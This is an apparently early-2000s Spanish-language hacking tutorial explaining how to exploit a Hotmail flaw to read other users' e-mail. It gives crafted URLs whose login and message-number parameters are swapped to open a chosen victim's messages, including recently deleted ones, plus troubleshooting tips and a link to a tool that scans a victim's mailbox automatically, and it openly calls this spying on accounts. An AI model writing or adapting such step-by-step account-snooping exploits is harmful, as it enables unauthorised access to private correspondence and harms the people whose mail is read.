Tres Pasos para ver algunos correos en Hotmail (Probado con Internet Explorer 5)

Para ver completamente un mensaje de alguna cuenta de hotmail hay que hacer lo siguiente:
1. Acceder a Hotmail normalmente con tu nombre de usuario o con cualquier otro que conozcas.

2. Utiliza un link como este para ver un mensaje espec�fico de un usuario espec�fico:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%
3d9999999999999999%26raw%3d0%26login%3dusername%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com

o bien:

http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%
3d9999999999999999%26raw%3d0%26login%3dusername%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com

De ese link cambia los siguientes valores:

MSG943322803%2e16 (N�mero de mensaje, es s�mplemente un
contador. %2e
equivale a "." )
username ------(El nombre de usuario de la cuenta de correo que
quieras espiar)
Ejemplos de n�meros de mensaje:
MSG943322803%2e1
MSG943322803%2e22
MSG943322803%2e149

(borra "%26raw%3d0" si quieres ver el correo como una ventana normal de hotmail en lugar de ver el mensaje como texto sin formato)

(borra "&hm___fl=attrd&domain=hotmail.com" si no quieres que aparezca el frame superior de hotmail)

Nota. Todo lo parecido a "%2e", etc. son c�digos ascii hexadecimal.
Debes utilizarlos en lugar de los caracteres normales. Aqu� tienes una lista completa:
www.december.com/html/spec/ascii.html

3. Ya est�. Si introduces un n�mero de mensaje correcto puedes
leer ese determinado mensaje (siempre que exista ese mensaje claro :)
(Comprueba el m�todo antes con tus propios mensajes en hotmail
para saber como funciona).

Como teclear cada vez un n�mero de mensaje es un trabajo bastante
pesado, los chicos de root core han creado una peque�a utilidad
para escanear autom�ticamente un rango de mensajes de un usuario
espec�fico.
La puedes bajar aqu�: http://rootcore.can-host. com/files/hobo04r2.zip
Para ver los mensajes necesitas trabajar con IExplorer y debes haber entrado previamente en tu cuenta de Hotmail.

Prueba el fallo en estos links de prueba:
(1. Entra en tu cuenta de hotmail, 2. Copia estos links y pruebalos en tu navegador)

Ejemplo texto sin formato (no se pueden ver los attach directamente)

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%
3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%
3djokutesti99%26domain%3dhotmail%
2ecom&hm___fl=attrd&domain=hotmail.com

ventana del buz�n normal: (puedes ver im�genes, etc. )

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%
3d9687%26disk%3d64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26domain%
3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

Puedes ver tambi�n mensajes eliminados. Si borras un mensaje en
hotmail y despu�s vac�as la papelera, el mensaje es visible
usando este tipo de link durante unas 6-12 horas aproximadamente.

Correcciones y m�s cosas:
Cambios en el link:
Eliminar par�metro: %26disk%3d64%2e4%2e36%2e68_d1577

Este par�metro causa un error en algunos casos: "Due to an
internal error your request cannot be processed. We apologize for the
inconvenience. Please try again later."

Soluci�n. Eliminar este par�metro del link, no es necesario.

Cambios en los par�metros: %26start%3d9702%26len%3d9687 en lugar
de %26start%3d1%26len%3d9999999999999999

Este par�metro determina justo el comienzo y la longitud
visualizable del email. Si pones el valor demasiado peque�o el
email
se ver� justo ese n�mero de car�cteres.

Si el usuario no tiene ese mensaje en su buz�n, se obtiene este
mensaje de error:
" Subject: Unable to locate message Content-Type: text/plain;
charset=us-ascii An error has prevented from locating the message."

Si el usuario no existe, se obtiene una p�gina completamente en
blanco.

Si existe alg�n error en la sintaxis del link normalmente
aparecer� la p�gina de acceso de hotmail pidiendo de nuevo el
password.

Si tienes dificultades para ver mensajes comprueba que has
introducido correctamente el n�mero de mensaje.
(MSGXXXXXXXXX.YYY)
El valor Y puede ser oscilar entre 0-nnn. nnn puede ser lo que sea,
dependiendo del n�mero de mensajes en ese buz�n. 100, 200, etc.

Comprueba que la sintaxis del link es correcta.

Comprueba que has entrado en tu cuenta de Hotmail.

Prueba a cambiar el servidor. En lugar de pv2fd.pav2.hotmail ,
intentalo con lw14fd.law14.hotmail.

Si los links de prueba de Root Core ya no son operativos, sin duda es
debido a que hotmail ya ha solucionado el problema.

Lo m�s probable es que deje de funcionar en poco tiempo, pero de
momento comprobadlo. Los test aportados por Root Core funcionan al
100% as� que el fallo sigue activo. Hoy se cumplen 3 d�as desde
que se avis� del error a Hotmail. Hoy estamos a 21 de Agosto en
Espa�a.

Informaci�n completa y actualizada, por supuesto en Root Core:
www.root-core.com , y en la lista de correo de Bugtraq.

Hasta la pr�xima.
www.vanhackez.com